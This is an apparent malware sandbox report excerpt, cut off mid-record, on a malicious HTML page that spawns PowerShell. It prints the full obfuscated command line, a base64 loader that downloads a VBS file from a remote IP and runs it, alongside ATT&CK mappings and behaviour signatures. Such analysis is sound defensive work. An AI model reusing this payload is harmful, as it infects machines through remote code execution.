"Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Mon Feb 10 07:51:16 2025, 1st section name \".debug$S\"", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSCF43C3EF31D3408DB37A77EEBAE2248A.TMP", "file_size": 652, "sha256": "b43c5dd79fe2a08aa0a53bd62b02066b496267f657d2f7eb9c09f08d417e69c3", "type_tags": ["unknown"], "description": "MSVC .res", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "NACMJB4Y.txt", "file_size": 539, "sha256": "05fbfc0f0069bafa10c7145eee5e634a2dfb2dfd0970171c0d7542e04d7f3c8f", "type_tags": ["text"], "description": "ASCII text", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "HJW2BZHK.txt", "file_size": 454, "sha256": "120e3bcc44895ccf295ecb849f3eb635506d14516f1ba9abea7963a83b9bbbe9", "type_tags": ["text"], "description": "ASCII text", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CZCV38S8.txt", "file_size": 371, "sha256": "3f305a94a5ac3642e65c6d0291e1f79b46962878601c980fbfef2d1a37161a30", "type_tags": ["text"], "description": "ASCII text", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005760", "name": "iexplore.exe", "normalized_path": "%PROGRAMFILES%\\Internet Explorer\\iexplore.exe", "command_line": "C:\\53567cc7f7c6d7d1538b06ce9bc2d61b262c5fe0b491afcbb68b042e4ecb1128.html", "sha256": "8abc7daa81c8a20bfd88b6a60ecc9ed1292fbb6cedbd6f872f36512d9a194bba"}, {"uid": "00000000-00005960", "parentuid": "00000000-00005760", "name": "iexplore.exe", "normalized_path": "%PROGRAMFILES%\\Internet Explorer\\iexplore.exe", "command_line": "SCODEF:5760 CREDAT:275457 /prefetch:2", "sha256": "8abc7daa81c8a20bfd88b6a60ecc9ed1292fbb6cedbd6f872f36512d9a194bba"}, {"uid": "00000000-00002724", "parentuid": "00000000-00005960", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "\"/c pOWershell.exe -ex bypASS -NOP -w 1 -C DeviCECredEnTiaLdeploYmeNt ; iEX($(IEx('[sYStEM.TEXT.encOdinG]'+[cHar]0x3a+[ChAR]0X3a+'UtF8.GetstrING([SYSTeM.CoNVERt]'+[chaR]0X3a+[chAr]0X3A+'fROMbASe64sTrING('+[ChAr]34+'JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWRjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExvS2Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdWlDeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1ZzdFpkblYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWJPY0x4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWU5aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGb3VoICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHa29QeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi80MzAvZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29kLmdJRiIsIiRlTnY6QVBQREFUQVxnb29kZ2lybGFsd2F5c2JlYWdvb2RnaXJsd2l0aGJldHRlcnBlcnNvbmdvb2dpcmx3aXRoLnZicyIsMCwwKTtTdEFSVC1zbGVFcCgzKTtJbnZPa2UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29naXJsd2l0aC52YnMi'+[ChAr]34+'))')))\"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00006096", "parentuid": "00000000-00002724", "name": "powershell.exe", "normalized_path": "%WINDIR%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "-ex bypASS -NOP -w 1 -C DeviCECredEnTiaLdeploYmeNt ; iEX($(IEx('[sYStEM.TEXT.encOdinG]'+[cHar]0x3a+[ChAR]0X3a+'UtF8.GetstrING([SYSTeM.CoNVERt]'+[chaR]0X3a+[chAr]0X3A+'fROMbASe64sTrING('+[ChAr]34+'JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWRjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExvS2Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdWlDeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1ZzdFpkblYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWJPY0x4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWU5aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGb3VoICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHa29QeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi80MzAvZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29kLmdJRiIsIiRlTnY6QVBQREFUQVxnb29kZ2lybGFsd2F5c2JlYWdvb2RnaXJsd2l0aGJldHRlcnBlcnNvbmdvb2dpcmx3aXRoLnZicyIsMCwwKTtTdEFSVC1zbGVFcCgzKTtJbnZPa2UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29naXJsd2l0aC52YnMi'+[ChAr]34+'))')))\"", "sha256": "70ba57fb0bf2f34b86426d21559f5f6d05c1268193904de8e959d7b06ce964ce"}, {"uid": "00000000-00005220", "parentuid": "00000000-00006096", "name": "csc.exe", "normalized_path": "%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", "command_line": "/noconfig /fullpaths @\"%TEMP%\\bbotlxd5\\bbotlxd5.cmdline\"", "sha256": "086c38fd66aec0e824ecb74ece3d7124174201a9b4f5c9974fcfdbaf04a5870e"}, {"uid": "00000000-00002728", "parentuid": "00000000-00005220", "name": "cvtres.exe", "normalized_path": "%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe", "command_line": "/NOLOGO /READONLY /MACHINE:IX86 \"/OUT:%TEMP%\\RES9B07.tmp\" \"%TEMP%\\bbotlxd5\\CSCF43C3EF31D3408DB37A77EEBAE2248A.TMP\"", "sha256": "e4dbdbf7888ea96f3f8aa5c4c7f2bcf6e57d724dd8194fe5f35b673c6ef724ea"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Drive-by Compromise", "attck_id": "T1189", "attck_id_wiki": "https://attack.mitre.org/techniques/T1189", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "PowerShell", "attck_id": "T1059.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 3}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "informative_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Compile After Delivery", "attck_id": "T1027.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "HTML Smuggling", "attck_id": "T1027.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "suspicious_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\IsoScope_1680_IESQMMUTEX_0_519\"\n \"Local\\URLBLOCK_DOWNLOAD_MUTEX\"\n \"IsoScope_1680_IESQMMUTEX_0_331\"\n \"{5312EE61-79E3-4A24-BFE1-132B85B23C3A}\"\n \"IsoScope_1680_IESQMMUTEX_0_303\"\n \"Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_5760\"\n \"IsoScope_1680_IE_EarlyTabStart_0x173c_Mutex\"\n \"{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}\"\n \"Local\\VERMGMTBlockListFileMutex\"\n \"IsoScope_1680_ConnHashTable<5760>_HashTable_Mutex\"\n \"Local\\URLBLOCK_HASHFILESWITCH_MUTEX\"\n \"IsoScope_1680_IESQMMUTEX_0_519\"\n \"Local\\!BrowserEmulation!SharedMemory!Mutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_5760\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\IsoScope_1680_IE_EarlyTabStart_0x173c_Mutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\IsoScope_1680_ConnHashTable<5760>_HashTable_Mutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"powershell.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\eznbtczr.xg0.ps1\"\n \"powershell.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\nrw3pgpb.u0j.psm1\"\n \"powershell.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bbotlxd5\\bbotlxd5.0.cs\"\n \"powershell.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bbotlxd5\\bbotlxd5.cmdline\"\n \"powershell.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bbotlxd5\\bbotlxd5.out\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"powershell.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 63730000\n \"csc.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll\" at 02B00000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"powershell.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74F10000\n \"powershell.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 74AD0000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"powershell.exe\" touched \"NetworkListManager\" (Path: \"HKCU\\CLSID\\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\")\n \"powershell.exe\" touched \"Network List Manager\" (Path: \"HKCU\\CLSID\\{A47979D2-C419-11D9-A5B4-001185AD2B89}\")\n \"powershell.exe\" touched \"PSFactoryBuffer\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\")\n \"powershell.exe\" touched \"NDP SymBinder\" (Path: \"HKCU\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\INPROCSERVER32\")\n \"powershell.exe\" touched \"WinInetBroker Class\" (Path: \"HKCU\\CLSID\\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-18", "type": 3, "relevance": 10, "name": "Accesses Software Policy Settings", "description": "\"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CERTIFICATES\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CRLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CTLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CERTIFICATES\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CRLS\"; Key: \"\")\n \"powershell.exe\" (Path: 